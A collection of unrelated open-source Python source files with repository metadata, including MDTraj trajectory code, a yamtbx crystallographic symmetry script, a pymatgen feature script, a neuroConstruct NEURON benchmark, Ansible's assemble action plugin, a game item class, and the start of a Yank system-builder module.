lfilter_zi to choose the initial condition of the filter. 
b, a = butter(order, 2.0 / width) zi = lfilter_zi(b, a) xyz = self.xyz.copy() for i in atom_indices: for j in range(3): signal = xyz[:, i, j] padded = np.r_[signal[pad - 1: 0: -1], signal, signal[-1: -pad: -1]] # Apply the filter to the width. z, _ = lfilter(b, a, padded, zi=zi*padded[0]) # Apply the filter again, to have a result filtered at an order # the same as filtfilt. z2, _ = lfilter(b, a, z, zi=zi*z[0]) # Use filtfilt to apply the filter. output = filtfilt(b, a, padded) xyz[:, i, j] = output[(pad-1): -(pad-1)] if not inplace: return Trajectory(xyz=xyz, topology=self.topology, time=self.time, unitcell_lengths=self.unitcell_lengths, unitcell_angles=self.unitcell_angles) self.xyz = xyz def _check_valid_unitcell(self): """Do some sanity checking on self.unitcell_lengths and self.unitcell_angles """ if self.unitcell_lengths is not None and self.unitcell_angles is None: raise AttributeError('unitcell length data exists, but no angles') if self.unitcell_lengths is None and self.unitcell_angles is not None: raise AttributeError('unitcell angles data exists, but no lengths') if self.unitcell_lengths is not None and np.any(self.unitcell_lengths < 0): raise ValueError('unitcell length < 0') if self.unitcell_angles is not None and np.any(self.unitcell_angles < 0): raise ValueError('unitcell angle < 0') @property def _have_unitcell(self): return self._unitcell_lengths is not None and self._unitcell_angles is not None def image_molecules(self, inplace=False): """Recenter and apply periodic boundary conditions to the molecules in each frame of the trajectory. This method is useful for visualizing a trajectory in which molecules were not wrapped to the periodic unit cell, or in which the macromolecules are not centered with respect to the solvent. It tries to be intelligent in deciding what molecules to center, so you can simply call it and trust that it will "do the right thing". Parameters ---------- inplace : bool, default=False If False, a new Trajectory is created and returned. If True, this Trajectory is modified directly. Returns ------- traj : md.Trajectory The return value is either ``self`` or the new trajectory, depending on the value of ``inplace``. """ if self._topology is None: raise ValueError('Trajectory must have a Topology that defines molecules') unitcell_vectors = self.unitcell_vectors if unitcell_vectors is None: raise ValueError('This Trajectory does not define a periodic unit cell') molecules = self._topology.find_molecules() all_atoms = list(self._topology.atoms) if inplace: result = self else: result = Trajectory(xyz=self.xyz, topology=self.topology, time=self.time, unitcell_lengths=self.unitcell_lengths, unitcell_angles=self.unitcell_angles) sorted_bonds = sorted(self._topology.bonds, key=lambda bond: bond[0].index) # Select the anchor molecules. molecules.sort(key=lambda x: -len(x)) atoms_cutoff = max(len(molecules[int(0.1*len(molecules))]), int(0.1*len(molecules[0]))) anchor_molecules = [m for m in molecules if len(m) > atoms_cutoff] other_molecules = [m for m in molecules if len(m) <= atoms_cutoff] num_anchors = len(anchor_molecules) anchor_atom_indices = [] for mol in anchor_molecules: anchor_atom_indices += [atom.index for atom in mol] # Loop over frames and process each one. for frame in range(self.n_frames): # Fix each molecule to ensure the periodic boundary conditions are not splitting it into pieces. 
frame_positions = result.xyz[frame] for atom1, atom2 in sorted_bonds: pos1 = frame_positions[atom1.index, :] pos2 = frame_positions[atom2.index, :] delta = pos2-pos1 offset = np.zeros((3)) offset += unitcell_vectors[frame,2]*np.round(delta[2]/unitcell_vectors[frame,2,2]) offset += unitcell_vectors[frame,1]*np.round((delta[1]-offset[1])/unitcell_vectors[frame,1,1]) offset += unitcell_vectors[frame,0]*np.round((delta[0]-offset[0])/unitcell_vectors[frame,0,0]) frame_positions[atom2.index, :] -= offset # Compute the distance between each pair of anchor molecules in this frame. anchor_dist = np.zeros((num_anchors, num_anchors)) anchor_nearest_atoms = np.zeros((num_anchors, num_anchors, 2), dtype=int) for mol1 in range(num_anchors): atoms1 = np.array([atom.index for atom in anchor_molecules[mol1]], dtype=int) for mol2 in range(mol1): atoms2 = np.array([atom.index for atom in anchor_molecules[mol2]], dtype=int) contact = find_closest_contact(self, atoms1, atoms2, frame) anchor_dist[mol1, mol2] = contact[2] anchor_dist[mol2, mol1] = contact[2] atoms = np.array(contact[:2]) anchor_nearest_atoms[mol1, mol2] = atoms anchor_nearest_atoms[mol2, mol1] = atoms # Start by taking the largest molecule as our first anchor. used_anchors = [0] available_anchors = list(range(1, num_anchors)) min_anchor_dist = anchor_dist[0, :] # Add in anchors one at a time, always taking the one that is nearest an existing anchor. while len(available_anchors) > 0: next_index = np.argmin(min_anchor_dist[available_anchors]) next_anchor = available_anchors[next_index] # Find which existing anchor it's closest to, and choose the periodic copy that minimizes # the distance to that anchor. nearest_to = used_anchors[np.argmin(anchor_dist[next_anchor, used_anchors])] atoms = anchor_nearest_atoms[next_anchor, nearest_to] if all_atoms[atoms[0]] in molecules[next_anchor]: atoms = atoms[::-1] delta = frame_positions[atoms[1]]-frame_positions[atoms[0]] offset = np.zeros((3)) offset += unitcell_vectors[frame,2]*np.round(delta[2]/unitcell_vectors[frame,2,2]) offset += unitcell_vectors[frame,1]*np.round((delta[1]-offset[1])/unitcell_vectors[frame,1,1]) offset += unitcell_vectors[frame,0]*np.round((delta[0]-offset[0])/unitcell_vectors[frame,0,0]) for atom in molecules[next_anchor]: frame_positions[atom.index] -= offset # Transfer it from the available list to the used list. used_anchors.append(next_anchor) del available_anchors[next_index] # Find the center of all anchor molecules. if num_anchors == 0: center = np.zeros((3)) else: center = np.mean(frame_positions[anchor_atom_indices], axis=0) # Loop over all molecules, apply the correct offset (so that anchor molecules will end up centered # in the periodic box), and then wrap the molecule into the box. offset = 0.5*np.array((unitcell_vectors[frame,0,0], unitcell_vectors[frame,1,1], unitcell_vectors[frame,2,2])) - center result.xyz[frame, :] += offset for mol in other_molecules: mol_atom_indices = [atom.index for atom in mol] mol_center = np.mean(result.xyz[frame, mol_atom_indices], axis=0) mol_offset = mol_center.copy() mol_offset -= unitcell_vectors[frame,2]*np.floor(mol_offset[2]/unitcell_vectors[frame,2,2]) mol_offset -= unitcell_vectors[frame,1]*np.floor(mol_offset[1]/unitcell_vectors[frame,1,1]) mol_offset -= unitcell_vectors[frame,0]*np.floor(mol_offset[0]/unitcell_vectors[frame,0,0]) result.xyz[frame, mol_atom_indices] += mol_offset-mol_center if not inplace: return result return self
swails/mdtraj
mdtraj/core/trajectory.py
Python
lgpl-2.1
78,389
[ "Amber", "CHARMM", "Desmond", "Gromacs", "LAMMPS", "MDTraj", "NAMD", "NetCDF", "OpenMM" ]
6db7d284468f5255fbf6ef8843e34d9d1a83c8d8900263553abe1f4c3c158c82
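A minimal usage sketch of the Trajectory API defined in the file above, assuming a hypothetical local input file traj.h5; md.load, Topology.select, slicing, superpose, join (via +) and the extension-dispatched save are all defined or dispatched by the code shown:

import mdtraj as md

# Load a trajectory; the extension picks the reader ('traj.h5' is a
# hypothetical local file, not part of the repository above).
traj = md.load('traj.h5')

# __getitem__ delegates to Trajectory.slice(), so this copies every 10th frame.
subsampled = traj[::10]

# Align all frames onto frame 0 using only the alpha-carbon atoms.
ca_atoms = subsampled.topology.select('name CA')
subsampled.superpose(subsampled, frame=0, atom_indices=ca_atoms)

# __add__ delegates to join(), concatenating along the frame axis.
doubled = subsampled + subsampled

# save() looks up the writer in _savers() by extension, here save_dcd().
doubled.save('aligned.dcd')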
""" (c) RIKEN 2017. All rights reserved. Author: Keitaro Yamashita This software is released under the new BSD License; see LICENSE. """ from yamtbx.dataproc.auto.multi_merging.resolve_reindex import KabschSelectiveBreeding from yamtbx.util import read_path_list from libtbx.utils import multi_out import iotbx.phil import libtbx.phil from cctbx import sgtbx from cctbx import crystal import os import sys import copy import numpy master_params_str = """\ lstin = None .type = path .help = list of XDS_ASCII.HKL method = pointless *selective_breeding .type = choice(multi=False) .help = method from_p1 = False .type = bool .help = Start from P1 whatever the symmetry of input files. logfile = "multi_determine_symmetry.log" .type = path .help = logfile name nproc = 1 .type = int .help = number of processors d_min = 3 .type = float .help = high resolution cutoff used in the method min_ios = None .type = float .help = minimum I/sigma(I) cutoff used in the method max_delta = 5 .type = float .help = maximum obliquity used in determining the lattice symmetry, using a modified Le-Page algorithm. max_cycles = 100 .type = int(value_min=1) .help = Maximum number of cycles for selective_breeding algorithm. """ def run(params): log_out = multi_out() log_out.register("log", open(params.logfile, "w"), atexit_send_to=None) log_out.register("stdout", sys.stdout) libtbx.phil.parse(master_params_str).format(params).show(out=log_out, prefix=" ") xac_files = read_path_list(params.lstin, only_exists=True, err_out=log_out) if len(xac_files) == 0: print >>log_out, "No (existing) files in the list: %s" % params.lstin return if params.method == "selective_breeding": rb = KabschSelectiveBreeding(xac_files, max_delta=params.max_delta, d_min=params.d_min, min_ios=params.min_ios, nproc=params.nproc, log_out=log_out, from_p1=params.from_p1) xs = rb.representative_crystal_symmetry() log_out.write("Starting from:\n") xs.show_summary(log_out, " ") log_out.write("\n") rb.assign_operators(max_cycle=params.max_cycles) rb.show_assign_summary() final_cc_means = rb.final_cc_means() assert len(final_cc_means) == len(xac_files) reidx_ops = rb.reindex_operators() sg = copy.copy(xs.space_group()) unit_cell = xs.unit_cell() cc0 = map(lambda x: x[0][1], final_cc_means) log_out.write("Analyzing KabschSelectiveBreeding result..\n") accepted_ops = [] for iop in range(1, len(reidx_ops)): cci = map(lambda x: x[iop][1], final_cc_means) corr = numpy.corrcoef(cc0, cci)[0,1] log_out.write(" h,k,l vs %s: corr= %.4f\n" % (reidx_ops[iop].as_hkl(), corr)) if corr > 0.5: accepted_ops.append(reidx_ops[iop]) sg.expand_smx(reidx_ops[iop].as_hkl()) unit_cell = unit_cell.change_basis(reidx_ops[iop]) log_out.write(" this operator accepted. sg= %s\n" % sg.info()) log_out.write("Solution:\n") new_xs = crystal.symmetry(unit_cell, space_group=sg) new_xs.show_summary(log_out, " ") log_out.write("As reference setting:\n") new_xs.as_reference_setting().show_summary(log_out, " ") log_out.write("Initial:\n") xs.show_summary(log_out, " ") log_out.write(""" * Notice * Here the space group is deduced from the similarity of reflection intensities under the constraint of lattice symmetry. This could be wrong especially when the crystal is twineed. Please note that space group is only determined when the structure is solved. 
""") else: raise "invalid method choice (method=%s)" % params.method # run() def show_help(): print """ """ iotbx.phil.parse(master_params_str).show(prefix=" ", attributes_level=1) print # show_help() def run_from_args(argv): if "-h" in argv or "--help" in argv: show_help() return cmdline = iotbx.phil.process_command_line(args=argv, master_string=master_params_str) params = cmdline.work.extract() args = cmdline.remaining_args for arg in args: if os.path.isfile(arg) and params.lstin is None: params.lstin = arg if params.lstin is None: show_help() print "Error: Give .lst of XDS_ASCII files" quit() run(params) # run_from_args() if __name__ == "__main__": import sys run_from_args(sys.argv[1:])
keitaroyam/yamtbx
yamtbx/dataproc/auto/command_line/multi_determine_symmetry.py
Python
bsd-3-clause
4,678
[ "CRYSTAL" ]
8fd004b42a9f1a1f6a1326803491993b032001f3672ca78d197d81a418a2f294
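The operator-acceptance rule in run() above reduces to a Pearson-correlation threshold between CC columns. A self-contained sketch of just that rule, with fabricated CC values for illustration (real values come from rb.final_cc_means()):

import numpy as np

# Stand-in for rb.final_cc_means(): one row per input file, one
# (operator_index, mean_cc) pair per reindexing operator. Numbers invented.
final_cc_means = [
    [(0, 0.95), (1, 0.93)],
    [(0, 0.90), (1, 0.41)],
    [(0, 0.92), (1, 0.88)],
]

cc0 = [row[0][1] for row in final_cc_means]  # identity operator h,k,l
accepted = []
for iop in range(1, len(final_cc_means[0])):
    cci = [row[iop][1] for row in final_cc_means]
    corr = np.corrcoef(cc0, cci)[0, 1]
    if corr > 0.5:  # same cutoff as in run()
        accepted.append(iop)
print("accepted operator indices:", accepted)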
### FEATURE VECTORS ### """ From Wei's paper, we know natural log of volume (lnV), energy per atom (Ec), elemental weighted average of atomic number (AlnZ), and elemental weighted std deviation of electronegativity (SX) correlate relatively strongly to bulk modulus (K). Feature vectors that utilize these correlations will aid in predicting bulk moduli of materials. We eventually want to reduce these vectors to 2D. We will try every combination of features in vectors from 1-4 dimensions. Hypothesis: 4D vector with all correlations will perform the best """ import os import numpy as np from pymatgen.core.periodic_table import Element from pymatgen import MPRester from math import log def element_lister(material): element_list = [] for element in material['reduced_cell_formula']: for i in range(int(material['reduced_cell_formula'][element])): element_list += [element] return element_list def get_ln_volume(material, elem_list): return log(material['volume']/material['nsites']) def get_c_energy_per_atom(material, elem_list): energy_per_atom = material['formation_energy_per_atom'] total_energy = energy_per_atom*len(elem_list) return total_energy def get_avg_Z_num(material, elem_list): Z_list = [] for element in elem_list: Z_list += [log(Element(element).Z)] return np.average(Z_list) def get_sd_X(material, elem_list): X_list = [] for element in elem_list: X_list += [log(Element(element).X)] return np.std(X_list) key = os.environ['MAPI_KEY'] m = MPRester(key) materials_list = m.query(criteria={"elasticity": {"$exists": True}}, properties=['pretty_formula', 'reduced_cell_formula', "elasticity.K_VRH", 'volume', 'density', 'formation_energy_per_atom', 'formation_energy_per_atom', 'nsites']) def vectorize_and_catalog(materials): vector_list = [] catalog = {} for material in materials: element_list = element_lister(material) vector = [get_ln_volume(material, element_list), get_c_energy_per_atom(material, element_list), get_avg_Z_num(material, element_list), get_sd_X(material, element_list)] vector_list += [vector] catalog[tuple(vector)] = material return vector_list, catalog def vector_to_material(vector): return catalog[tuple(vector)] def normalize_vectors(vector_list): vector_array = np.array(vector_list) mean_each_column = np.mean(vector_array, axis=0) std_each_column = np.std(vector_array, axis=0) for i in range(len(vector_array)): difference_from_mean = np.subtract(vector_array[i], mean_each_column) vector_array[i] = np.divide(difference_from_mean, std_each_column) return vector_array
mp-interns/eratosthenes
neigh/featurevectors.py
Python
bsd-2-clause
2,684
[ "pymatgen" ]
68ad110b47c55c9d7e1bd6255e25d347ce42c266a2895c8015e9c263a18ebb29
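The four feature functions above can be exercised without a Materials Project API key by hand-building one record shaped like the MPRester query result (the module itself queries MP at import time, so this sketch inlines the same arithmetic instead of importing it). Note that get_c_energy_per_atom, despite its name, returns the per-atom formation energy multiplied by the atom count, i.e. a total; the sketch mirrors that. All numbers are illustrative, not real Materials Project data.

from math import log
import numpy as np
from pymatgen.core.periodic_table import Element

# Hand-built record with the fields the m.query(...) call above returns.
mat = {'reduced_cell_formula': {'Na': 1.0, 'Cl': 1.0},
       'volume': 44.6, 'nsites': 2, 'formation_energy_per_atom': -2.1}

# element_lister(): expand the reduced formula into one symbol per atom.
elems = [el for el, n in mat['reduced_cell_formula'].items()
         for _ in range(int(n))]

ln_volume = log(mat['volume'] / mat['nsites'])                 # lnV per site
total_energy = mat['formation_energy_per_atom'] * len(elems)   # total, see note
avg_ln_z = np.average([log(Element(e).Z) for e in elems])      # AlnZ
sd_ln_x = np.std([log(Element(e).X) for e in elems])           # SX (log scale)

print([ln_volume, total_energy, avg_ln_z, sd_ln_x])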
# # # File to generate network for execution on parallel NEURON # Note this script has only been tested with UCL's cluster! # # Author: Padraig Gleeson # # This file has been developed as part of the neuroConstruct project # This work has been funded by the Medical Research Council and the # Wellcome Trust # # import sys import os import time try: from java.io import File except ImportError: print "Note: this file should be run using ..\\..\\..\\nC.bat -python XXX.py' or '../../../nC.sh -python XXX.py'" print "See http://www.neuroconstruct.org/docs/python.html for more details" quit() sys.path.append(os.environ["NC_HOME"]+"/pythonNeuroML/nCUtils") from ucl.physiol.neuroconstruct.hpc.mpi import MpiSettings from ucl.physiol.neuroconstruct.simulation import SimulationData import ncutils as nc # Many useful functions such as SimManager.runMultipleSims found here projFile = File("../Parallel.ncx") ########### Main settings ########### simDuration = 100 # ms simDt = 0.025 # ms neuroConstructSeed = 1234 simulatorSeed = 1111 simulators = ["NEURON"] simConfigs = [] simConfigs.append("LargeNetwork") mpiConfigs = [MpiSettings.MATLEM_1PROC, MpiSettings.MATLEM_2PROC, MpiSettings.MATLEM_4PROC, \ MpiSettings.MATLEM_8PROC, MpiSettings.MATLEM_16PROC,MpiSettings.MATLEM_32PROC,MpiSettings.MATLEM_64PROC, MpiSettings.MATLEM_128PROC, MpiSettings.MATLEM_216PROC] #mpiConfigs = [MpiSettings.LOCAL_SERIAL] mpiConfigs = [MpiSettings.MATLEM_1PROC, MpiSettings.MATLEM_2PROC, MpiSettings.MATLEM_4PROC,MpiSettings.MATLEM_16PROC,MpiSettings.MATLEM_32PROC, MpiSettings.MATLEM_64PROC, MpiSettings.MATLEM_128PROC, MpiSettings.MATLEM_216PROC] #mpiConfigs = [MpiSettings.LOCAL_4PROC] mpiConfigs = ["LEMMON_8","LEMMON_16", "LEMMON_24", "LEMMON_32", "LEMMON_40"] multipleRuns = [-1, -2, -3, -4] multipleRuns = [-1] suggestedRemoteRunTime = 120 # mins varTimestepNeuron = False analyseSims = True plotSims = True plotVoltageOnly = True simAllPrefix = "B_" # Adds a prefix to simulation reference numCells1 = 6000 numCells2 = 6000 runInBackground = True verbose = True runSims = True #runSims = False saveAsHdf5 = True #saveAsHdf5 = False saveOnlySpikes = True from ucl.physiol.neuroconstruct.neuron import NeuronFileManager runMode = NeuronFileManager.RUN_HOC #runMode = NeuronFileManager.RUN_PYTHON_XML numConcurrentSims = 4 if mpiConfigs != [MpiSettings.LOCAL_SERIAL]: numConcurrentSims = 30 ####################################### def testAll(argv=None): if argv is None: argv = sys.argv print "Loading project from "+ projFile.getCanonicalPath() simManager = nc.SimulationManager(projFile, numConcurrentSims = numConcurrentSims, verbose = verbose) ### Change num in each cell group simManager.project.cellGroupsInfo.getCellPackingAdapter("lg1").setMaxNumberCells(numCells1) simManager.project.cellGroupsInfo.getCellPackingAdapter("lg2").setMaxNumberCells(numCells2) allSims = simManager.runMultipleSims(simConfigs = simConfigs, simDt = simDt, simDuration = simDuration, simulators = simulators, runInBackground = runInBackground, varTimestepNeuron = varTimestepNeuron, mpiConfigs = mpiConfigs, suggestedRemoteRunTime = suggestedRemoteRunTime, simRefGlobalPrefix = simAllPrefix, runSims = runSims, maxElecLens = multipleRuns, saveAsHdf5 = saveAsHdf5, saveOnlySpikes = saveOnlySpikes, runMode = runMode) while (len(simManager.allRunningSims)>0): print "Waiting for the following sims to finish: "+str(simManager.allRunningSims) time.sleep(5) # wait a while... 
simManager.updateSimsRunning() times = [] procNums = [] for sim in allSims: simDir = File(projFile.getParentFile(), "/simulations/"+sim) try: simData = SimulationData(simDir) simData.initialise() simTime = simData.getSimulationProperties().getProperty("RealSimulationTime") print "Simulation: %s took %s seconds"%(sim, simTime) times.append(float(simTime)) paraConfig = simData.getSimulationProperties().getProperty("Parallel configuration") print paraConfig numProc = int(paraConfig[max(paraConfig.find(" host, ")+7, paraConfig.find(" hosts, ")+8):paraConfig.find(" processor")]) procNums.append(numProc) except: print "Error analysing simulation data from: %s"%simDir.getCanonicalPath() print sys.exc_info() print times print procNums ''' import matplotlib.pyplot as plt lines = plt.loglog(times, procNums, 'r:') plt.ylabel('Simulation time') plt.xlabel('Number of processors') plt.show()''' from ucl.physiol.neuroconstruct.gui.plotter import PlotManager from ucl.physiol.neuroconstruct.gui.plotter import PlotCanvas from ucl.physiol.neuroconstruct.dataset import DataSet plotFrame = PlotManager.getPlotterFrame("Time for simulation run on different numbers of processors", 0, 1) plotFrame.setViewMode(PlotCanvas.INCLUDE_ORIGIN_VIEW) info = "Simulation times for: "+str(procNums) dataSet = DataSet(info, info, "#", "s", "Number of processors", "Simulation time") dataSet.setGraphFormat(PlotCanvas.USE_CIRCLES_FOR_PLOT) for i in range(len(times)): #dataSet.addPoint(procNums[i],times[i]*procNums[i]) dataSet.addPoint(procNums[i],times[i]) plotFrame.addDataSet(dataSet) if __name__ == "__main__": testAll()
pgleeson/TestArea
models/Parallel/pythonScripts/Big_Data.py
Python
gpl-2.0
6,552
[ "NEURON" ]
e6a660044e70823e468ebdcfaa180d0cc3fb708a1222e98d48304400b5d00095
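The commented-out matplotlib block in testAll() plots times on the x axis while labelling that axis "Number of processors"; a corrected, standalone sketch of the intended scaling plot follows (the proc_nums/times values are invented placeholders for the RealSimulationTime values harvested above):

import matplotlib.pyplot as plt

proc_nums = [1, 2, 4, 8, 16, 32]                    # hypothetical host counts
times = [820.0, 430.0, 235.0, 140.0, 95.0, 70.0]    # hypothetical wall times (s)

plt.loglog(proc_nums, times, 'ro-')
plt.xlabel('Number of processors')
plt.ylabel('Simulation time (s)')
plt.title('Scaling of the LargeNetwork simulation')
plt.show()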
# (c) 2013-2014, Michael DeHaan <michael.dehaan@gmail.com> # Stephen Fromm <sfromm@gmail.com> # Brian Coca <briancoca+dev@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import os.path import tempfile import re from ansible.errors import AnsibleError from ansible.plugins.action import ActionBase from ansible.utils.boolean import boolean from ansible.utils.hashing import checksum_s from ansible.utils.unicode import to_str class ActionModule(ActionBase): TRANSFERS_FILES = True def _assemble_from_fragments(self, src_path, delimiter=None, compiled_regexp=None, ignore_hidden=False): ''' assemble a file from a directory of fragments ''' tmpfd, temp_path = tempfile.mkstemp() tmp = os.fdopen(tmpfd,'w') delimit_me = False add_newline = False for f in sorted(os.listdir(src_path)): if compiled_regexp and not compiled_regexp.search(f): continue fragment = "%s/%s" % (src_path, f) if not os.path.isfile(fragment) or (ignore_hidden and os.path.basename(fragment).startswith('.')): continue fragment_content = file(self._loader.get_real_file(fragment)).read() # always put a newline between fragments if the previous fragment didn't end with a newline. if add_newline: tmp.write('\n') # delimiters should only appear between fragments if delimit_me: if delimiter: # un-escape anything like newlines delimiter = delimiter.decode('unicode-escape') tmp.write(delimiter) # always make sure there's a newline after the # delimiter, so lines don't run together if delimiter[-1] != '\n': tmp.write('\n') tmp.write(fragment_content) delimit_me = True if fragment_content.endswith('\n'): add_newline = False else: add_newline = True tmp.close() return temp_path def run(self, tmp=None, task_vars=None): if task_vars is None: task_vars = dict() result = super(ActionModule, self).run(tmp, task_vars) if self._play_context.check_mode: result['skipped'] = True result['msg'] = "skipped, this module does not support check_mode." 
return result src = self._task.args.get('src', None) dest = self._task.args.get('dest', None) delimiter = self._task.args.get('delimiter', None) remote_src = self._task.args.get('remote_src', 'yes') regexp = self._task.args.get('regexp', None) follow = self._task.args.get('follow', False) ignore_hidden = self._task.args.get('ignore_hidden', False) if src is None or dest is None: result['failed'] = True result['msg'] = "src and dest are required" return result remote_user = task_vars.get('ansible_ssh_user') or self._play_context.remote_user if not tmp: tmp = self._make_tmp_path(remote_user) self._cleanup_remote_tmp = True if boolean(remote_src): result.update(self._execute_module(tmp=tmp, task_vars=task_vars, delete_remote_tmp=False)) self._remove_tmp_path(tmp) return result else: try: src = self._find_needle('files', src) except AnsibleError as e: result['failed'] = True result['msg'] = to_str(e) return result if not os.path.isdir(src): result['failed'] = True result['msg'] = "Source (%s) is not a directory" % src return result _re = None if regexp is not None: _re = re.compile(regexp) # Does all work assembling the file path = self._assemble_from_fragments(src, delimiter, _re, ignore_hidden) path_checksum = checksum_s(path) dest = self._remote_expand_user(dest) dest_stat = self._execute_remote_stat(dest, all_vars=task_vars, follow=follow, tmp=tmp) diff = {} # setup args for running modules new_module_args = self._task.args.copy() # clean assemble specific options for opt in ['remote_src', 'regexp', 'delimiter', 'ignore_hidden']: if opt in new_module_args: del new_module_args[opt] new_module_args.update( dict( dest=dest, original_basename=os.path.basename(src), ) ) if path_checksum != dest_stat['checksum']: if self._play_context.diff: diff = self._get_diff_data(dest, path, task_vars) remote_path = self._connection._shell.join_path(tmp, 'src') xfered = self._transfer_file(path, remote_path) # fix file permissions when the copy is done as a different user self._fixup_perms((tmp, remote_path), remote_user) new_module_args.update( dict( src=xfered,)) res = self._execute_module(module_name='copy', module_args=new_module_args, task_vars=task_vars, tmp=tmp, delete_remote_tmp=False) if diff: res['diff'] = diff result.update(res) else: result.update(self._execute_module(module_name='file', module_args=new_module_args, task_vars=task_vars, tmp=tmp, delete_remote_tmp=False)) self._remove_tmp_path(tmp) return result
ramondelafuente/ansible
lib/ansible/plugins/action/assemble.py
Python
gpl-3.0
6,337
[ "Brian" ]
261b1bc376a65de30503fbd75bcfb6a869127063b5f71878148f1ff70b2ecc0d
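A rough, self-contained Python 3 sketch of the concatenation rules implemented by _assemble_from_fragments above (sorted listing, optional regexp filter, hidden-file skip, delimiter between fragments, newline repair); the unicode-escape decoding of the delimiter is omitted, and the function name is invented for illustration:

import os
import re
import tempfile

def assemble_fragments(src_path, delimiter=None, pattern=None, ignore_hidden=False):
    """Concatenate the files in src_path into one temp file; return its path."""
    compiled = re.compile(pattern) if pattern else None
    pieces = []
    for name in sorted(os.listdir(src_path)):
        path = os.path.join(src_path, name)
        if compiled and not compiled.search(name):
            continue
        if not os.path.isfile(path) or (ignore_hidden and name.startswith('.')):
            continue
        with open(path) as f:
            content = f.read()
        if pieces:
            # never let two fragments run together on one line
            if not pieces[-1].endswith('\n'):
                pieces.append('\n')
            # delimiters only appear between fragments, newline-terminated
            if delimiter is not None:
                pieces.append(delimiter)
                if not delimiter.endswith('\n'):
                    pieces.append('\n')
        pieces.append(content)
    fd, out_path = tempfile.mkstemp()
    with os.fdopen(fd, 'w') as out:
        out.write(''.join(pieces))
    return out_path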
import src class GlassCrystal(src.items.Item): """ a walkable glass crystal resource item that leaves no scrap behind when destroyed """ type = "GlassCrystal" name = "glass crystal" description = "a fraction of something bigger" walkable = True bolted = False def __init__(self): """ set up internal state """ super().__init__(display="++") def destroy(self, generateScrap=True): """ destroy without residue Parameters: generateScrap: flag to leave no residue """ super().destroy(generateScrap=False) src.items.addType(GlassCrystal)
MarxMustermann/OfMiceAndMechs
src/itemFolder/resources/glassCrystal.py
Python
gpl-3.0
579
[ "CRYSTAL" ]
47732277a161aaaa1021a1d8be8d1604b2083d5e045132361d40250574d7b3e8
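The file above is essentially the whole recipe for adding a resource item to this codebase: subclass src.items.Item, set the class attributes, pick a two-character display glyph, and register the class with src.items.addType. A hypothetical sibling item following the same pattern (the class name, glyph and description are invented; src.items comes from the repository itself):

import src

class GlassShard(src.items.Item):
    """
    a hypothetical sibling of GlassCrystal, shown only to illustrate the pattern
    """

    type = "GlassShard"
    name = "glass shard"
    description = "a sharp leftover from a shattered crystal"
    walkable = True
    bolted = False

    def __init__(self):
        """
        set up internal state
        """
        super().__init__(display="+.")

src.items.addType(GlassShard)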
#!/usr/bin/python #============================================================================================= # MODULE DOCSTRING #============================================================================================= """ Tools for constructing OpenMM System objects from various convenient input file formats. DESCRIPTION This module contains tools for constructing OpenMM System objects for receptor-ligand systems from various convenient input formats, and includes the ability to form models of complexes from individual receptor and ligand files. """ #============================================================================================= # GLOBAL DEFINITIONS #============================================================================================= __author__ = 'Patrick Grinaway' #============================================================================================= # GLOBAL IMPORTS #============================================================================================= import abc import copy import os, os.path import tempfile import numpy as np import simtk.openmm.app as app import simtk.unit as units #============================================================================================= # ABSTRACT BASE CLASS #============================================================================================= class SystemBuilder(object): """ Abstract base class for SystemBuilder classes. This is a base class for other classes that will create systems for use with Yank Only its children should use it. Several unimplemented methods must be overridden To be in a valid and consistent state, each subclass must have defined the following properties after initialization: _positions, _topology, _ffxmls Properties ---------- positions : simtk.openmm.Quantity with units compatible with nanometers, wrapping a numpy.array of natoms x 3 Atomic positions associated with the constructed System object. topology : simtk.openmm.app.Topology OpenMM Topology specifying system. system : simtk.openmm.System The OpenMM System object created by this SystemBuilder. natoms : int The number of atoms in the system. ffxmls : list of str List of OpenMM ForceField ffxml file contents used to parameterize this System. system_creation_parameters : dict of str Key-value pairs passed to ForceField.createSystem() when system is created. TODO: * Make system_creation_parameters private and use setter/getters that only allow changes to dict before self._system has been created. """ __metaclass__ = abc.ABCMeta def __init__(self, ffxml_filenames=None, ffxmls=None, system_creation_parameters=dict(), molecule_name="MOL"): """ Abstract base class for SystemBuilder classes. Parameters ---------- ffxml_filenames : list of str, optional, default=None List of OpenMM ForceField ffxml filenames (relative or absolute) used to parameterize the System. ffxmls : list of str, optional, default=None List of ffxml file contents used to parameterize the System. system_creation_parameters : dict of str, optional, default=None If specified, these key-value parameters are used in the creation of the System object via ForceField.createSystem(). If None, an empty dict is used. """ if ffxmls is None: ffxmls = set() # empty set # Set private class properties. self._ffxmls = ffxmls # Start with contents of any specified ffxml files. self._append_ffxmls(ffxml_filenames) # Append contents of any ffxml files to be read. 
        self._molecule_name = molecule_name # Optional molecule name
        self._topology = None # OpenMM Topology object
        self._positions = None # OpenMM positions as simtk.unit.Quantity with units compatible with nanometers
        self._system = None # OpenMM System object created by ForceField
        self._forcefield = None # OpenMM ForceField object, created on demand when the System is built
        self.system_creation_parameters = system_creation_parameters # dictionary of parameters passed to ForceField.createSystem()

        return

    def _read_ffxml(self, ffxml_filename):
        """
        Read the contents of the specified ffxml file, using relative or absolute paths.

        Parameters
        ----------
        ffxml_filename : str
           An XML file defining the force field.
           Each entry may be an absolute file path, a path relative to the current working
           directory, or a path relative to this module's data subdirectory (for built in
           force fields).

        TODO:
        * Also try append .xml or .ffxml extensions.

        """
        try:
            infile = open(ffxml_filename, 'r')
        except IOError:
            from simtk.openmm.app import forcefield
            forcefield_data_dir = os.path.join(os.path.dirname(app.forcefield.__file__), 'data')
            fullpath = os.path.join(forcefield_data_dir, ffxml_filename)
            infile = open(fullpath, 'r')
        ffxml = infile.read()
        infile.close()
        return ffxml

    def _append_ffxmls(self, ffxml_filenames):
        """
        Read specified ffxml files and append to internal _ffxml structure.

        Parameters
        ----------
        ffxml_filenames : list of str
           A list of XML files defining the force field.
           Each entry may be an absolute file path, a path relative to the current working
           directory, or a path relative to this module's data subdirectory (for built in
           force fields).

        """
        if ffxml_filenames:
            for ffxml_filename in ffxml_filenames:
                ffxml = self._read_ffxml(ffxml_filename)
                self._ffxmls.add(ffxml)
        return

    def _create_system(self):
        """
        Create the OpenMM System object.
        """
